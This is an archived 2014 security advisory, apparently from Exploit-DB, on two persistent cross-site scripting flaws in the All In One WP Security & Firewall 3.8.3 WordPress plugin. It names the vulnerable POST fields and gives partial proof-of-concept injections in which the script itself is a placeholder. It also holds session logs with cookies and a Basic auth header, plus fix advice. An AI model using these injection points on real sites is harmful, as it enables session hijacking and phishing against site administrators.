WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting

EDB-ID:

34854

CVE:





Platform:

PHP

Date:

2014-10-02


Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325


Release Date:
=============
2014-09-29


Vulnerability Laboratory ID (VL-ID):
====================================
1327


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a 
security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website 
security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces 
security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security 
practices and techniques.

(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.


Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin.
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service.

The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module.
Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the  404 detection redirect url input field and the execution occurs in the same section 
next to the input field context that gets displayed again.

The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module.
Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section 
next to the input field context that gets displayed again.

The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. 
Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module context.


Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] Firewall - Detection 404
				[+] FileSystem Components > Host System
Vulnerable Parameter(s):
				[+] 404 detection redirect url
				[+] file name error logs url

Affected Module(s):
				[+] Firewall - Detection 404
				[+] FileSystem Components > Host System


Proof of Concept (PoC):
=======================
1.1
The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or 
medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and 
steps below to continue.

PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )

<tr valign="top">
                <th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\" 
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
                <span class="description">A blocked visitor will be automatically redirected to this URL.</span>
                </td> 
            </tr>
        </table>
        <input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" />
            
        </form>
        </div></div>
        <div class="postbox">
        <h3><label for="title">404 Event Logs</label></h3>
        <div class="inside">
                        <form id="tables-filter" method="post">
            <!-- For plugins, we also need to ensure that the form posts back to our current page -->
            <input type="hidden" name="page" value="aiowpsec_firewall" />
                        <input type="hidden" name="tab" value="tab6" />            <!-- Now we can render the completed list table -->
            <input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer" 
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" />	<div class="tablenav top">

		<div class="alignleft actions">
			<select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")"  />
</div>
<div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a>
<a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
<span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span>
<a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
<a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div>
<br class="clear" />
</div>


--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[8095] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:40:21 GMT]
      Content-Type[text/html; charset=UTF-8]
      Content-Length[8095]
      Connection[keep-alive]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]

-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:40:22 GMT]
      Content-Type[text/html]
      Content-Length[557]
      Connection[keep-alive]
      Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
      Etag["4ea065b-3c6-4dcad48e5901e"]
      Accept-Ranges[bytes]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      X-Powered-By[PleskLin]




Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0




1.2
The second POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium 
user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: FileSystem Components > Host System Logs

<div class="inside">
            <p>Please click the button below to view the latest system logs:</p>
            <form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden">
<div>Enter System Log File Name:
                <input size="25" name="aiowps_system_log_file" value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
                <span class="description">Enter your system log file name. (Defaults to error_log)</span>
                </div>
                <div class="aio_spacer_15"></div>
                <input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit">
                <span style="display: none;" class="aiowps_loading_1">
                    <img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt="">
                </span>            
            </form>
        </div>


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime Type[application/json]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
      Content-Length[109]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      interval[60]
      _nonce[176fea481c]
      action[heartbeat]
      screen_id[wp-security_page_aiowpsec_filesystem]
      has_focus[false]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:53:44 GMT]
      Content-Type[application/json; charset=UTF-8]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Robots-Tag[noindex]
      x-content-type-options[nosniff]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]




Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[6136] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:53:54 GMT]
      Content-Type[text/html; charset=UTF-8]
      Content-Length[6136]
      Connection[keep-alive]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]




Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the Enter System Log File Name input context in the file system security module.
The second issue can be patched by a secure encode and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module.
Restrit the input and handle malicious context with a own secure eception handling to prevent further POSt injection attacks.


Security Risk:
==============
The security risk of the POSt inject web vulnerabilities in the firewall module are estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]


-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com